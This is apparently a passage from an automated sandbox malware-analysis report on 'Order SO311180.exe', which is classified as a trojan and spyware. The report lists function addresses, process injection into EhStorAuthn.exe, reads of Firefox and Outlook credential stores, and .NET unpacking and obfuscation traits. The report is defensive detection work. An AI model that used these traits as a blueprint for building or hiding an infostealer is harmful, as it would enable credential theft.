Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C03E6 7_2_050C03E6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500E3F0 7_2_0500E3F0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A0274 7_2_050A0274
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050802C0 7_2_050802C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500AD00 7_2_0500AD00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF0CF2 7_2_04FF0CF2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509CD1F 7_2_0509CD1F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05018DBF 7_2_05018DBF
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000C00 7_2_05000C00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FFADE0 7_2_04FFADE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A0CB5 7_2_050A0CB5
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05042F28 7_2_05042F28
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05020F30 7_2_05020F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A2F30 7_2_050A2F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05074F40 7_2_05074F40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0507EFA0 7_2_0507EFA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500CFE0 7_2_0500CFE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BEE26 7_2_050BEE26
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF2FC8 7_2_04FF2FC8
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000E59 7_2_05000E59
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05012E90 7_2_05012E90
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BCE93 7_2_050BCE93
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BEEDB 7_2_050BEEDB
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FE68B8 7_2_04FE68B8
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05016962 7_2_05016962
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050029A0 7_2_050029A0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050CA9A6 7_2_050CA9A6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500A840 7_2_0500A840
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05002840 7_2_05002840
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0502E8F0 7_2_0502E8F0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BAB40 7_2_050BAB40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FFEA80 7_2_04FFEA80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B6BD7 7_2_050B6BD7
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B7571 7_2_050B7571
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF1460 7_2_04FF1460
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509D5B0 7_2_0509D5B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C95C3 7_2_050C95C3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BF43F 7_2_050BF43F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BF7B0 7_2_050BF7B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05045630 7_2_05045630
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B16CC 7_2_050B16CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050CB16B 7_2_050CB16B
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0503516C 7_2_0503516C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500B1B0 7_2_0500B1B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FEF172 7_2_04FEF172
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050070C0 7_2_050070C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050AF0CC 7_2_050AF0CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B70E9 7_2_050B70E9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BF0E0 7_2_050BF0E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B132D 7_2_050B132D
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0504739A 7_2_0504739A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050052A0 7_2_050052A0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FED34C 7_2_04FED34C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501B2C0 7_2_0501B2C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A12ED 7_2_050A12ED
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05003D40 7_2_05003D40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B1D5A 7_2_050B1D5A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B7D73 7_2_050B7D73
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501FDC0 7_2_0501FDC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05079C32 7_2_05079C32
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFCF2 7_2_050BFCF2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFF09 7_2_050BFF09
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05001F92 7_2_05001F92
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFFB1 7_2_050BFFB1
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05009EB0 7_2_05009EB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05095910 7_2_05095910
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05009950 7_2_05009950
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501B950 7_2_0501B950
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0506D800 7_2_0506D800
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050038E0 7_2_050038E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFB76 7_2_050BFB76
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501FB80 7_2_0501FB80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05075BF0 7_2_05075BF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0503DBF9 7_2_0503DBF9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFA49 7_2_050BFA49
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B7A46 7_2_050B7A46
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05073A6C 7_2_05073A6C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05045AA0 7_2_05045AA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509DAAC 7_2_0509DAAC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A1AA3 7_2_050A1AA3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050ADAC6 7_2_050ADAC6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030B1A00 7_2_030B1A00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030ACB50 7_2_030ACB50
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030AABD0 7_2_030AABD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030AC92A 7_2_030AC92A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030AC930 7_2_030AC930
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030B32B0 7_2_030B32B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030B5060 7_2_030B5060
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030CB700 7_2_030CB700
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531D778 7_2_0531D778
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531E6B3 7_2_0531E6B3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531E1F4 7_2_0531E1F4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531E314 7_2_0531E314
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_053253CD 7_2_053253CD
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 018C5130 appears 58 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 0190F290 appears 105 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 018FEA12 appears 86 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 018D7E54 appears 111 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 0187B970 appears 280 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 05035130 appears 58 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 0507F290 appears 105 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 05047E54 appears 111 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 04FEB970 appears 280 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 0506EA12 appears 86 times
Sample file is different than original file name gathered from version info
Source: Order SO311180.exe, 00000000.00000002.2232231434.000000000B150000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Order SO311180.exe
Source: Order SO311180.exe, 00000000.00000002.2212037230.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Order SO311180.exe
Source: Order SO311180.exe, 00000003.00000002.2685987048.000000000142A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameEhStorAuthn.exej% vs Order SO311180.exe
Source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameEhStorAuthn.exej% vs Order SO311180.exe
Source: Order SO311180.exe, 00000003.00000002.2686263558.000000000197D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Order SO311180.exe
Source: Order SO311180.exe Binary or memory string: OriginalFilenameAzqa.exe8 vs Order SO311180.exe
Uses 32bit PE files
Source: Order SO311180.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Order SO311180.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.SetAccessControl
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.AddAccessRule
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.SetAccessControl
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.AddAccessRule
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.SetAccessControl
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs Security API names: _0020.AddAccessRule
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, Ly3Li8ceu4tkjjHeC9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/3
Source: C:\Users\user\Desktop\Order SO311180.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order SO311180.exe.log Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File created: C:\Users\user\AppData\Local\Temp\s002-5p Jump to behavior
Source: Order SO311180.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Order SO311180.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3419665811.00000000033C5000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2885611691.00000000033F3000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3419665811.0000000003418000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2883200340.00000000033E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Order SO311180.exe ReversingLabs: Detection: 52%
Source: unknown Process created: C:\Users\user\Desktop\Order SO311180.exe "C:\Users\user\Desktop\Order SO311180.exe"
Source: C:\Users\user\Desktop\Order SO311180.exe Process created: C:\Users\user\Desktop\Order SO311180.exe "C:\Users\user\Desktop\Order SO311180.exe"
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Order SO311180.exe Process created: C:\Users\user\Desktop\Order SO311180.exe "C:\Users\user\Desktop\Order SO311180.exe" Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe" Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Order SO311180.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Order SO311180.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: EhStorAuthn.pdbGCTL source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GfSuWuMUukRRDP.exe, 00000006.00000002.3420506622.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000000.2764840219.0000000000AAE000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Order SO311180.exe, Order SO311180.exe, 00000003.00000002.2686263558.0000000001850000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000007.00000003.2688036889.0000000004E16000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.000000000515E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000002.3422073850.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000007.00000003.2685808951.0000000004C64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb source: Order SO311180.exe, 00000003.00000002.2685987048.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000003.2630488308.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000002.3420777214.0000000000B87000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.Order SO311180.exe.37b0b90.2.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.b150000.4.raw.unpack, pqaMb7FdwTXuqb3dXy.cs .Net Code: hc4jwue98X System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.425af50.0.raw.unpack, pqaMb7FdwTXuqb3dXy.cs .Net Code: hc4jwue98X System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.6c10000.3.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Order SO311180.exe.42e2b70.1.raw.unpack, pqaMb7FdwTXuqb3dXy.cs .Net Code: hc4jwue98X System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAA102 push edx; ret 0_2_00BAA103
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAA150 push ebx; ret 0_2_00BAA15F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAC4E9 push cs; ret 0_2_00BAC4F6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA4659 push edx; retn 0004h 0_2_00BA465A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA47AF push esi; retn 0004h 0_2_00BA47B2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA4778 push esi; retn 0004h 0_2_00BA477A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BAAC58 pushfd ; retn 0004h 0_2_00BAAC5A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_00BA5913 pushfd ; ret 0_2_00BA5916
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C676A1 push esi; ret 0_2_06C676A2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6766B push esi; ret 0_2_06C67672
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67668 push esi; ret 0_2_06C6766A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C674DF push ebp; ret 0_2_06C674E2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C675C8 push esi; ret 0_2_06C675CA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C605EB push es; ret 0_2_06C605F2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67518 push ebp; ret 0_2_06C67522
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68223 pushad ; ret 0_2_06C6822A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C68221 pushad ; ret 0_2_06C68222
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C67383 push 5D906C66h; ret 0_2_06C6739B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C673A3 push edx; ret 0_2_06C673AA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C673A1 push edx; ret 0_2_06C673A2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C62348 push ds; ret 0_2_06C6237A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_06C6737B push edx; ret 0_2_06C67382
